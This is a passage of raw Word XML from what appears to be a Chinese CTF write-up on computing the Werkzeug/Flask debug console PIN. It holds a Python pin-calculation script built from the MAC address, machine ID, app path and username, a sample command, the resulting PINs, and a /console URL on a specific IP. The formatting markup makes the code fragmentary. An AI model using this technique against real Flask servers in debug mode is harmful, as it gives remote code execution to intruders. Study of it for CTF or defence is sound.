    <w:p w14:paraId="072FF837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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.username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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5651F83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lastRenderedPageBreak/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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.modnam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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC7CEC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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.appname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A67B8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714137E2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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A67B8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E09C43F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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA9B8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1CEC45A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= [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3914CD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macToInt(aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.MAC),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDFBCFD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   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bytes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aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.machineId, encoding = 'utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1161F873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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768512A4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md5Pin = sub_114514(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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2906A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sha1Pin = sub_7f7f7f7f7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f(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A67B8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>probably_public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,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rivate_bits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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F01B71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1059866F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print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"Md5Pin:  " + md5Pin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B77BF17" w14:textId="558715A2" w:rsidR="00BC55DD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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A67B8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>print(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"Sha1Pin:  " + sha1Pin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1A75DD" w14:textId="77777777" w:rsid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63769566" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRPr="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00BC55DD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</w:p>
    <w:p w14:paraId="41E09B31" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRPr="00BC55DD" w:rsidRDefault="00BC55DD" w:rsidP="00EA3779">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00371C75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最后：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B6129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8A67B8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>python .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A67B8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\pin.py -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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A67B8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> acff8a1c-6825-4b9b-b8e1-8983ce1a8b94 -M 02:42:ac:18:00:02 -p /usr/local/lib/python3.11/site-packages/flask/app.py -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A67B8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pincalculate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FDB45A0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Md5Pin: 208-479-340</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0AEA4A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Sha1Pin: 252-749-991</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCAC038" w14:textId="77777777" w:rsidR="008A67B8" w:rsidRPr="008A67B8" w:rsidRDefault="008A67B8" w:rsidP="008A67B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A67B8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://101.200.138.180:10006/console?pin=252-749-991</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22800EEA" w14:textId="77777777" w:rsidR="00BC55DD" w:rsidRPr="008A67B8" w:rsidRDefault="00BC55DD" w:rsidP="00EA3779">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00BC55DD" w:rsidRPr="008A6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197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8A67B8"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00BC55DD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BC5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BC55D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7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-01T09:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>